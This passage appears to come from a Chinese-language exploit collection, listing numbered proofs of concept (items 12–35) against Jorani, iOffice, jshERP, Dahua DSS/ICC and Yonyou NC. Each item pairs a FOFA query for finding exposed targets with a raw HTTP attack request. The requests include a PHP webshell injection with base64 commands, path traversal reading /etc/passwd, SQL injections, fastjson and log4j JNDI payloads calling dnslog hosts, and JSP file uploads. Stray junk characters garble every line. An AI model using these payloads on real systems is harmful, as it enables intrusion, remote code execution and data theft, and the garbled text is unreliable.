, _1 [9 p4 n. o. F1 iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
0 q1 W2 o; `1 }2 i& g# \Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
8 o( B, o! L8 L" n7 WAccept-Encoding: gzip, deflate
" p, W& ?6 L7 J# \5 e1 AAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
! i. G" R0 U) t; U) N4 e$ Y9 a% yConnection: close* y3 x7 h9 G1 s1 H5 Q0 z4 x( y
, w" h. }3 i) V4 n% [' a0 n" x d$ ?! c
6 s" N2 P, ?( r: f3 H
12. Jorani < 1.0.2 远程命令执行: [' G- c# I' b
FOFA:title="Jorani"3 F% B; ^, l3 _6 G! d0 U7 F* w
第一步先拿到cookie
. Y9 l k$ e' K* M! nGET /session/login HTTP/1.1
u: q$ u/ V/ N0 n/ kHost: 192.168.190.30! `8 K7 S- ^3 F1 b
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
: O L8 g# G' ]8 vConnection: close- ]4 q* q) K; e7 }) Q! Z6 o/ p6 [
Accept-Encoding: gzip: y( [) `$ B2 }( Z: I1 ?. c
. s! z5 _& T9 d1 w D
8 C; v9 m, [+ `$ R4 L响应中csrf_cookie_jorani用于后续请求
7 e+ X8 n- \; l Y/ ?( l h5 O, F" Q% OHTTP/1.1 200 OK
4 ^, g6 f$ c, b L' K& BConnection: close
7 {0 Z. d1 U% \2 E) {Cache-Control: no-store, no-cache, must-revalidate# W7 h9 q9 \% K6 o8 V" ]+ V
Content-Type: text/html; charset=UTF-84 A% x6 @' k. m6 g( k4 z, i
Date: Tue, 24 Oct 2023 09:34:28 GMT4 {( F5 L% g0 `/ T/ o+ x4 y
Expires: Thu, 19 Nov 1981 08:52:00 GMT
7 U, m' G7 M/ b3 `9 e# N- _2 wLast-Modified: Tue, 24 Oct 2023 09:34:28 GMT+ b$ Z+ D: A. I8 E3 N
Pragma: no-cache3 i* B( V) e- [6 L, }& F/ @
Server: Apache/2.4.54 (Debian)/ @$ z1 J6 o+ D. V6 f
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/% X: [. m2 M+ V6 Z5 I7 a
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly( R, R3 h. v% X( ~( u1 L
Vary: Accept-Encoding
5 O% C B! Z- N7 a/ [# u4 ~( [# U. s% G
. a5 g* h7 ~4 g- j6 B3 t
POST请求,执行函数并进行base64编码5 F3 a$ W, N" x7 o
POST /session/login HTTP/1.14 Z3 n2 ~5 S3 [# r9 v$ ^
Host: 192.168.190.30" W6 H1 i! J. R; V
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
% @( G7 j/ |% r o+ A8 K) E1 PConnection: close: s9 x5 b [( c
Content-Length: 252& `. m3 u0 ]) P5 u8 V
Content-Type: application/x-www-form-urlencoded+ L( u7 E, }* a$ Y e& I
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r, I% a% g+ d: G5 o0 {2 m6 U/ S
Accept-Encoding: gzip$ Y! O+ O. V9 P
U- f0 k" w; D, fcsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor( `* R4 O) U% z+ i0 W
. o; E" Y2 t5 d! X9 D$ A
# U0 F. l- Y( t5 P7 v* R- V/ g# M" z
/ f" p. K8 E* h向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
* {3 K) ~& T* N! bGET /pages/view/log-2023-10-24 HTTP/1.1
& Q# L+ s& }1 I- R1 k9 E. q/ e; i9 o1 hHost: 192.168.190.30
% p: ^: ~6 r4 g1 L! i& s" F' SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
1 v Y5 o% m) n$ U. O! H7 t0 M' iConnection: close
+ l8 ?7 n9 ?' NCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
4 d3 h: j6 [6 Q) PK1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=5 Y8 `, R0 A3 I/ l. c: l9 e
X-REQUESTED-WITH: XMLHttpRequest
/ r% F/ s. C/ r: ^( b- R6 }+ F& w' w- ZAccept-Encoding: gzip. _( Q: _. W8 f7 H- g1 Y
3 [$ s6 p0 y& B5 Q1 w, d6 H
( R" R! u4 w6 q8 u* v. o5 ~
13. 红帆iOffice ioFileDown任意文件读取) z+ x3 s3 }" _) i: H1 o- X2 H% B
FOFA:app="红帆-ioffice"
8 n0 }4 G/ C/ S+ ~GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1" h& ~# M$ v' _0 p+ n& D( Y
Host: x.x.x.x& X5 u; [ W4 o
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36! x; ~% u# ~+ z
Connection: close5 ~! A8 u/ Y) t: p U) L
Accept: */*
. H" V: K( C! h0 rAccept-Encoding: gzip
# J O" a" O- c9 k" m# t4 D3 Q4 b8 V$ O0 e7 ?; T l& K# j) p
/ p2 N; k, g: ]14. 华夏ERP(jshERP)敏感信息泄露
3 J% G* o7 n J2 V- U6 fFOFA:body="jshERP-boot"
# x8 @- b" E9 P& n: c3 y泄露内容包括用户名密码7 e$ v- l/ }. D6 m7 H" T
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1$ ?: d/ F! O+ @/ H* @0 P% T
Host: x.x.x.x
& G# T. D& _+ l! P5 L- h! fUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
6 H: a1 H6 U4 l' }8 R2 {Connection: close
7 H8 j* H; j; N1 f1 J5 PAccept: */** _+ R4 q N! u0 k+ l P1 Q) j
Accept-Language: en4 {* i+ T) x) {8 }& J F/ H3 L
Accept-Encoding: gzip
1 D) Y9 l2 J( N; p) }+ Y* N* d
0 O5 f9 s7 |4 R/ }8 M1 T& j9 c, Y& r4 \
15. 华夏ERP getAllList信息泄露9 S* M: o7 r5 u. B4 X; d
CVE-2024-04909 I7 F+ k0 }$ P
FOFA:body="jshERP-boot"
/ n" [" D; x/ W7 G( u( m* \泄露内容包括用户名密码
) `5 Q% A0 {/ x( u5 V4 ]GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
: Z! [1 e$ w" ?5 |# ]Host: 192.168.40.130:100+ |- i* A3 s6 J9 G
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
: ~. N1 _0 b* z* X5 V: ]Connection: close
8 P1 s6 ^5 L8 L* ~# LAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
! [2 z7 @& j# S$ G* JAccept-Language: en: l8 F' E( M; E
sec-ch-ua-platform: Windows
) }- }8 b4 ?' c( \" i( W; I) G2 aAccept-Encoding: gzip# Q: a6 B( ^3 Q& p! d' L
4 R( {: B5 W1 e: I) B
. L1 v3 F, U9 e4 F16. 红帆HFOffice医微云SQL注入
& n! t: B9 Z! F- S" KFOFA:title="HFOffice"7 a: U# z/ b+ T: p% _$ A3 B i/ ^4 c
poc中调用函数计算1234的md5值# C4 d; o3 {4 C; { `5 E0 t
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.14 H- n9 r) n& X9 Y- A6 n, _1 C+ E; ~4 S! m
Host: x.x.x.x. g& v& w P2 E( x2 ^8 S& x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
0 S6 _( C4 Q2 |' H9 IConnection: close
2 o4 G' ?9 G9 p8 z* n9 _Accept: */*0 x4 U }' F* D- j: K
Accept-Language: en
/ w8 U/ U2 `5 q+ wAccept-Encoding: gzip, Y* Q$ T2 o2 v8 K# F+ ~
' y# i4 e/ r2 _% I. p$ m' `4 _# C: J7 P+ j k% h5 Y" j+ o
17. 大华 DSS itcBulletin SQL 注入
" c2 q: s! v6 ]3 }* _7 a9 BFOFA:app="dahua-DSS"
' P; m9 P- H' @POST /portal/services/itcBulletin?wsdl HTTP/1.1* ^! v. x( m& D4 Q/ ^/ [3 K- }
Host: x.x.x.x
( _& R3 g& f) C6 s4 b2 W- qUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
1 ^ H9 ~, ?9 {4 i4 |- KConnection: close
8 G5 w; E, ]+ m! Y5 s0 G, DContent-Length: 345
5 j9 q# M0 F2 k" JAccept-Encoding: gzip
: i5 i2 B y* A! T! `
$ g0 X/ V5 W. ^<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
: i- \3 f2 ]) l: \& B, c<s11:Body>
$ o! M+ ^, Y9 A( G( R% b <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
* b7 {& y$ g" T5 J6 L, e3 W& G! D <netMarkings>
0 E8 T" G8 @6 a( d4 {% b8 t, c; t) F8 t (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
7 S$ Q: V9 ]% Z& r+ w1 N" J! Z </netMarkings>1 U* L h% t+ f8 Z, ~; i2 R4 t( L
</ns1:deleteBulletin>
3 _! ~8 M; V( U% k& W% f9 f </s11:Body>6 e; O0 }* |6 v! |, J
</s11:Envelope>; D; q! r4 j+ ?: B" j. {$ m4 f
: g W4 H0 Q9 S: V
$ D: E- W2 N3 F- d d7 l18. 大华 DSS 数字监控系统 user_edit.action 信息泄露2 D9 C: W9 b) v
FOFA:app="dahua-DSS"
+ w4 K; M C0 QGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
7 y$ z9 `$ o/ Q& HHost: your-ip" \3 R/ ~( F1 r# L, P& d Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
/ |8 ~4 S9 ?3 z- O6 FAccept-Encoding: gzip, deflate
2 u# q# o/ [' e2 P% Y. k- {0 V# `Accept: */*, b- S) ]4 X2 X! U4 h9 U
Connection: keep-alive' _, e1 a* @, J$ ]9 r
; L" E( o- `& p- O9 g
1 M, r3 R) j6 s' ~. S6 v( Q: H6 ]( D! U4 Z8 K
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入* E5 u+ G" I/ j# A6 r% X+ n- l
FOFA:app="dahua-DSS"
& D- O- ?7 i0 I) b: ?GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.12 M# G* x a* E1 a7 ^$ {
Host:( r# U8 {# ?* t' O
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
/ p1 j v4 a4 I# n& u7 L7 P& ZAccept-Encoding: gzip, deflate/ O; [' ^+ J# l0 p& @( ~
Accept: */*
0 x. A3 u& L7 d7 T- M, n& Z: GConnection: keep-alive6 k) f+ [3 w4 E/ U
) g- c! V4 Y: E+ n
0 q; L% j5 L, {. i
20. 大华ICC智能物联综合管理平台任意文件读取; w/ j# R3 j' p5 ]
FOFA:body="*客户端会小于800*"# z8 w2 u/ a; G
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.17 @( f8 P( Q6 \- L9 O$ N1 f; Y; a
Host: x.x.x.x
1 F. f9 M1 g aUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.369 O0 u9 x, P& e4 h3 ]3 I4 S. ^
Connection: close
2 b2 Y) z' W: e, o8 @0 f5 B3 zAccept: */*6 A" {# B, f$ K- M% _
Accept-Language: en5 i4 C1 _* g/ i8 C0 s4 \# ]: O
Accept-Encoding: gzip( C" s+ t5 x2 W3 e+ }* _
, J) `9 {+ J0 ?& y3 r' y
4 a! A' e4 \2 e
21. 大华ICC智能物联综合管理平台random远程代码执行
0 }0 U' b) g3 @FOFA:icon_hash="-1935899595"
4 u1 g2 }5 e; y+ y' Y M4 U+ ] f" GPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1! S& O9 D z5 c* ]
Host: x.x.x.x
& t0 M$ A3 g! X5 K# \9 p, OUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
( |" g2 g7 M b! Y, RContent-Length: 161
9 x9 c- _6 e9 T% q% HAccept-Encoding: gzip2 h% V6 [7 s7 b7 p' R5 y
Connection: close! A# ~% y7 U) i5 E+ G
Content-Type: application/json;charset=utf-8
; r5 a- C/ [# \3 Y3 G: p
9 W5 d- @/ Z8 \2 d{; {' X! U+ a3 f4 p/ _1 x: u
"a":{0 y3 |$ P1 F2 A4 K0 G$ n5 P
"@type":"com.alibaba.fastjson.JSONObject",9 B4 }' n( I. r4 D. c- M4 L
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}2 ` `0 u" r! x, U9 N& W# t
}""0 ^: {9 z" O- [1 x
}
0 B3 q% Z/ C! S0 J* c3 h; }; P0 a4 Q4 ]
6 |5 f" @" @) t( r) ]7 ^! D& {- C# b9 j5 O+ v5 [
22. 大华ICC智能物联综合管理平台 log4j远程代码执行+ l T5 b; z- E4 |2 s6 Z
FOFA:icon_hash="-1935899595"7 y2 ~2 I1 L/ V7 e
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.19 Y3 `) @. A0 U; R6 e' C
Host: your-ip" K( u+ k/ w- L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.362 h8 c& }1 ]; i* A, `0 K3 |& Q
Content-Type: application/json;charset=utf-8. K! j. ~* u$ L2 I `* z' L, u
- X3 E5 ^, E" m3 O/ i7 {5 k
{9 J/ u* n6 d- C) ?# o2 e0 p* F4 m1 M
"loginName":"${jndi:ldap://dnslog}"
+ L, s4 C) M9 m9 O9 n- T) M. A}- p* {# O* O F6 M% R/ J7 J& t0 |
/ Q5 @, _) `% R+ i& F, _ p% D7 |* X$ a' [. }: n
- l- S6 W. `. h/ r* g. D
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
$ \& E+ d' e. h/ nFOFA:icon_hash="-1935899595"
) {' O( p8 @6 S6 l: APOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
3 P9 i3 I) A' u- K1 bHost: your-ip
0 h& G$ f7 Z: E% o" @3 {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15, A4 }6 X, t0 C" Z6 ]9 G, I
Content-Type: application/json;charset=utf-8
, ]" }7 Y/ ^; E, ]) B. f/ w2 |Accept-Encoding: gzip
: Q U O/ o" s8 u1 z5 \ x- U; vConnection: close
3 `# r% u% T3 {6 h* ?* y f1 Z. s- Y1 ^! M: I
{2 W, |% f3 L8 C& i! S
"a":{
x* }6 _6 d, l9 k1 l% H1 N! r "@type":"com.alibaba.fastjson.JSONObject",
5 q ~7 x9 s9 i: X6 z {"@type":"java.net.URL","val":"http://DNSLOG"}- I" @- P" Y) `6 J! z0 F
}""! t4 B# r' u+ ^' d: A
}3 z. H2 G/ G4 a; _; F
! c+ u! X% u3 R7 X7 q' T3 r) A5 }# q' ~6 M {9 S% x* W
24. 用友NC 6.5 accept.jsp任意文件上传
+ v3 N5 \* T' y: C2 K, c" a# qFOFA:icon_hash="1085941792"
# j- @) Y1 d" p0 WPOST /aim/equipmap/accept.jsp HTTP/1.1& r. D4 g; H+ ]' v7 Y0 U. J- n( b
Host: x.x.x.x
4 h5 L$ P# |9 w) e; h- S. hUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
& {6 V$ n L' T7 Q8 u: Y$ E7 h9 |Connection: close" [. x; c9 }) y& s( ~
Content-Length: 449
; Y+ R8 q+ g% {: i# m* SAccept: */*- b1 E* w, k: T& P ^
Accept-Encoding: gzip
, y' W( Q! _0 ` wContent-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc3 W; J( `5 d$ U2 a6 l5 u
U0 h8 t7 w! M) I
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
' g" L1 F5 Q& ]2 s/ }3 KContent-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
; n1 E0 x& U2 D9 P/ OContent-Type: text/plain" g( e1 [8 g5 s e2 k; t! N3 n& i
! w9 K/ T6 d! s% r3 k& ^6 S
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
1 t1 G2 b" [: e! a( S" t% ]-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
+ h9 X8 F. [7 C+ ?Content-Disposition: form-data; name="fname"
$ R, T9 V0 Y6 L" D7 r' ]3 G# X$ m q1 `2 a5 w( q
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
2 |+ h; I+ e* r' O- Q6 F0 a' A-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--8 d$ h- @' ~ j, r0 h' Y* P
( T: {* G, ?& u$ X) Y' Y% O4 O
+ V, k$ S X% J* m
25. 用友NC registerServlet JNDI 远程代码执行$ L: u' j. T+ O# ^! h
FOFA:app="用友-UFIDA-NC"
8 s1 P$ |3 u4 m5 jPOST /portal/registerServlet HTTP/1.1
/ y$ Q: Z# v/ f: e: J9 D8 d% VHost: your-ip# y$ m- P9 b; g. t8 _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0- E# n7 w1 l5 W0 |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
* f9 p; \8 c( J4 M, }0 Z3 rAccept-Encoding: gzip, deflate
1 v3 ?# G- W' P4 KAccept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.69 p0 C( Y5 D+ }+ o: X( j! _2 x
Content-Type: application/x-www-form-urlencoded
& B& e3 |- c% c3 \8 V; N" k
$ P5 |5 M1 v# @+ s8 {type=1&dsname=ldap://dnslog: y# i1 J4 r1 w. A' r5 ~! F3 q
0 Y8 c2 |* y( \/ w0 L/ O: I
3 J7 ~5 q' |$ \" _- y1 J( _- h' r) C) r; ~0 H5 h' ~0 f
26. 用友NC linkVoucher SQL注入
3 \7 I/ P- ^/ ]+ u7 K/ |FOFA:app="用友-UFIDA-NC"4 W9 Q% s9 X# x. }* k' s
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1! b, v0 {3 d, V& s9 o" }& a, a
Host: your-ip
7 s4 ~) b/ j' ?6 H0 jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+ f1 @; U" D4 v( v& A% L6 r, XContent-Type: application/x-www-form-urlencoded
3 Y& d* ?# H+ Y/ G! F2 oAccept-Encoding: gzip, deflate
8 O) `; u- Z* |2 i9 [Accept: */*9 T7 W( u% F" B2 i6 C
Connection: keep-alive7 @3 \/ ^" f; J8 D+ H
, x7 l b8 k7 m! s; T i R& H. r" y3 @7 [* g) |& m
27. 用友 NC showcontent SQL注入5 i+ }( e3 q. O1 N; }
FOFA:icon_hash="1085941792"
]$ Y8 K* n. D+ h$ _9 yGET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
) R$ I+ |1 c e+ j* n; p: N. @Host: your-ip! N3 I, v! R6 L1 K5 X1 b! I, L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36# q; \, b, G, U1 g# ]' G% I5 T# n2 b
Accept-Encoding: identity
0 D: K- i/ i$ |# F% | q' [Connection: close. X; g- T* x& V, i; d+ f" t4 o1 Z
Content-Type: text/xml; charset=utf-8
' X; }3 _$ e( I1 i" B, c% b. q3 @8 p* U
1 G3 d/ j% [1 v
28. 用友NC grouptemplet 任意文件上传
4 d* s4 Z1 e4 ?/ M' k8 K- N' zFOFA:icon_hash="1085941792"
7 [8 b, I$ {" IPOST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.12 g B0 b: t# I+ n6 V& l5 V# B3 Q
Host: x.x.x.x
& K4 ?7 i: v9 I! n" n h5 lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.364 r: r" h7 n; N6 P
Connection: close; G$ N0 _5 w9 f" H
Content-Length: 268! L& r$ W5 s( O( n$ i1 `# x% l
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk" f0 u$ U# r" k
Accept-Encoding: gzip
+ @7 J( K5 F6 i# p9 P5 Y7 O6 R) J
1 j9 M' m" \$ c" z------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk8 Q6 Z& X6 E/ J- a$ j
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
3 \ ]/ s# j" l. E4 L- }Content-Type: application/octet-stream
}# n5 h2 S' x$ R, T+ Q/ j; V3 ?% v9 i% y O8 o% I9 g
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>6 T8 v- }, B. z
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
8 b# K! V3 A4 t" t0 q/ i
- p0 `3 C; t9 n1 S3 C- g: W0 B
& g3 \, ?) U3 L* R& A/uapim/static/pages/nc/head.jsp
9 f0 p+ s3 c2 A1 o& ^9 z7 h0 ^. L, L8 I. {# X: K
29. 用友NC down/bill SQL注入) u! p8 t) V0 h' H7 T9 C' ]
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"3 @% g# [" @" r' u U2 V& S8 Q
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1% }9 `( T7 E7 A/ M
Host: your-ip4 \. r" T% B$ A/ ^7 k N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
# o+ r6 S0 T. q' u6 t8 E2 u7 }/ pContent-Type: application/x-www-form-urlencoded! z/ M: E3 R; F( i
Accept-Encoding: gzip, deflate5 {2 y7 N- B/ K5 [7 y& o0 p
Accept: */*: I4 m7 m2 ?/ i; n: v I/ x
Connection: keep-alive
/ J: i7 M" Q- j8 w4 X! b) k) U; ] u# \5 B3 s' y0 m9 `. M! h
- \6 _/ ?0 T3 [( D6 P" n2 {5 K+ M
30. 用友NC importPml SQL注入$ P7 b" \5 }4 y/ Z Y
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
! U: Z- j. S3 A/ R- v% _8 d0 NPOST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.12 f; M' Y% K, {1 q) K
Host: your-ip
% o1 G- z2 Z$ X# e" mContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
* N7 \7 Y7 _* Z, W1 d4 B; VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36# h& E. P& I: S9 ^3 J l
Connection: close& k1 I$ B0 J) l( Y% t# A. X( ]/ v
0 \ \" Q# m2 m M# e# Y. S------WebKitFormBoundaryH970hbttBhoCyj9V* j& M) O. L+ Q
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"' F6 Y; I3 Q7 y9 P
Content-Type: image/jpeg
6 Q9 b' w ~% x. M0 |0 o0 w+ v------WebKitFormBoundaryH970hbttBhoCyj9V--5 M. }1 y3 w3 G, T! v
4 \8 _ T/ ?, X. b0 _8 e. u8 {: i
) L% D9 {" e4 J, U! ~31. 用友NC runStateServlet SQL注入( @9 P4 z" z" z
version<=6.54 h* v; O( o. Y# G/ [" N
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"7 }+ _6 ?5 a. {8 W6 H
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
4 x$ k8 _: X1 \Host: host% J+ q+ ?4 w! a9 g9 j$ }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
$ V! t+ B- I' E) c6 i* bContent-Type: application/x-www-form-urlencoded
' e/ h& d9 D' Y1 z2 d! f) [. o; \5 N9 |+ {+ G* O0 p
2 D; ]7 B8 C1 Z8 W, o
32. 用友NC complainbilldetail SQL注入
% Q$ [6 d! P! {) g# uversion= NC633、NC65
( Y6 B/ C% J) A4 l4 I3 CFOFA:app="用友-UFIDA-NC"
; _: ^* |( x7 E5 qGET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
% `6 J& ?0 e/ T9 ?Host: your-ip
2 z7 w2 k! t& J/ n! y5 UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
' z8 `( I2 v/ x1 tContent-Type: application/x-www-form-urlencoded
- Y$ I" ?2 P9 H* ^Accept-Encoding: gzip, deflate5 q5 O5 t8 P! [) ~# [ a
Accept: */*
! D, O! }/ Z8 Z* X1 ?$ HConnection: keep-alive% L6 |0 H3 F2 N) j1 d; w
( N" x1 f" m- l# ` D
: s& ?& H4 N- W* @7 [33. 用友NC downTax/download SQL注入" H a) F7 K& n% C7 h
version:NC6.5FOFA:app="用友-UFIDA-NC". v L' d0 O! F
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1# x* Z( R$ `* ~6 |6 {+ K' N3 M% L
Host: your-ip/ S, C4 L: \( `; n ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.363 i$ G: R' J% r1 B; _% U6 L+ Z0 g
Content-Type: application/x-www-form-urlencoded1 z- s) B$ \& g
Accept-Encoding: gzip, deflate
+ p) ?/ l, B: fAccept: */*
! V0 n! I: l* C2 @7 C. wConnection: keep-alive
d4 {1 n( u# o9 Q H
p9 s0 B0 Y$ v+ P: T; h9 S5 ?
/ N x$ z9 \* s34. 用友NC warningDetailInfo接口SQL注入2 d" @3 }4 m8 G" r, R6 B2 G
FOFA:app="用友-UFIDA-NC": G. Z. ]: W) n2 C$ E8 `
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
5 O5 I( Y' v9 d- ~0 F( EHost: your-ip
6 o7 \) H a- Z: J2 LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36' b/ F w1 u; u& b- g1 h
Content-Type: application/x-www-form-urlencoded
" v% U7 v* V: X. HAccept-Encoding: gzip, deflate
+ n: |5 N& o6 [# w7 tAccept: */*$ ^: K3 W0 L. W6 ~) {* s
Connection: keep-alive
8 h2 N z' l9 E: l0 q; Q" m8 u. K. ]4 K! x) X
" \$ c: \0 @) Q/ m# Z' G. ?
35. 用友NC-Cloud importhttpscer任意文件上传
